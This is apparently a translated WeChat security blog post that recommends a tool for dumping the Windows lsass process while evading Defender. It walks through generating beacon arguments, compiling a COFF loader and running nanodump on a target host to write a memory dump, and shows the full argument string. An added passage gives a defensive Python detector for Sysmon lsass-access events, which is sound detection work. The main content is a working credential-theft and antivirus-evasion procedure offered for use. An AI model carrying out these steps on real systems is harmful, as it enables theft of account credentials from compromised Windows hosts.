Here I recommend a project by a foreign author for dumping the lsass process.
The usual ways of dumping the lsass process are generally blocked by Defender.
Direct dump:
Using rundll32.exe
processdump:
Using the foreign author's project:
python3 beacon_generate.py
Beacon Argument Generator
addint <lsass process ID>
addString output.dmp
addint 1
addint 1
addint 0
addint 1
addint 0
addint 0
addint 0
addint 0
addint 0
addint 0
addString ""
addint 0
addint 0
addint 0
addString ""
addint 0
generate
b'59000000cc0200000b0000006f75747075742e646d700001000000010000000000000001000000000000000000000000000000000000000000000000000000030000002222000000000000000000000000000300000022220000000000'
Compile the files:
cd COFF-master
make
Run it on the target host:
COFFLoader64.exe go nanodump.x64.o 59000000cc0200000b0000006f75747075742e646d700001000000010000000000000001000000000000000000000000000000000000000000000000000000030000002222000000000000000000000000000300000022220000000000
defender:
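As an added defender-side example (not code from this post or from the project it recommends), the following parses constructed Sysmon Event ID 10 (ProcessAccess) records and flags handle opens on lsass.exe that request read/query rights from images outside an assumed allowlist; both the rundll32 path and an in-process COFF loader shown above surface as such an event. The field names are Sysmon's; the log lines, the compact record format and the allowlist are assumptions.

```python
"""Added detection example (not from the original post): flag suspicious
handle opens on lsass.exe in Sysmon Event ID 10 (ProcessAccess) records."""
import re

# Access-mask bits relevant to memory dumping (Windows PROCESS_* rights).
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400

# Assumed allowlist of images that legitimately touch lsass; tune per estate.
ALLOWED_SOURCES = {
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
}

# Constructed sample records in a compact "Key: value|Key: value" form.
SAMPLE_EVENTS = [
    "SourceImage: C:\\Windows\\System32\\svchost.exe|TargetImage: C:\\Windows\\System32\\lsass.exe|GrantedAccess: 0x1000",
    "SourceImage: C:\\Windows\\System32\\rundll32.exe|TargetImage: C:\\Windows\\System32\\lsass.exe|GrantedAccess: 0x1FFFFF",
    "SourceImage: C:\\Users\\u\\COFFLoader64.exe|TargetImage: C:\\Windows\\System32\\lsass.exe|GrantedAccess: 0x1010",
    "SourceImage: C:\\Users\\u\\COFFLoader64.exe|TargetImage: C:\\Windows\\System32\\notepad.exe|GrantedAccess: 0x1FFFFF",
    "SourceImage: C:\\Windows\\System32\\wininit.exe|TargetImage: C:\\Windows\\System32\\lsass.exe|GrantedAccess: 0x1010",
]

FIELD_RE = re.compile(r"(\w+): ([^|]*)")

def parse_event(line: str) -> dict:
    """Split one record into a {field: value} dict."""
    return {k: v.strip() for k, v in FIELD_RE.findall(line)}

def is_suspicious_lsass_access(event: dict) -> bool:
    """True when a non-allowlisted process opens lsass with read/query rights."""
    target = event.get("TargetImage", "").lower()
    if not target.endswith("\\lsass.exe"):
        return False
    if event.get("SourceImage", "").lower() in ALLOWED_SOURCES:
        return False
    mask = int(event.get("GrantedAccess", "0"), 16)
    return bool(mask & (PROCESS_VM_READ | PROCESS_QUERY_INFORMATION))

def find_suspicious(lines) -> list:
    """Return the source image of every record that trips the rule."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if is_suspicious_lsass_access(ev):
            hits.append(ev["SourceImage"])
    return hits

if __name__ == "__main__":
    for src in find_suspicious(SAMPLE_EVENTS):
        print("suspicious lsass access from", src)
```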
Reply 20231202 to get the project address.
Originally published on the WeChat official account (Relay学安全): Bypassing Defender to Dump the Lsass Process (Project Recommendation)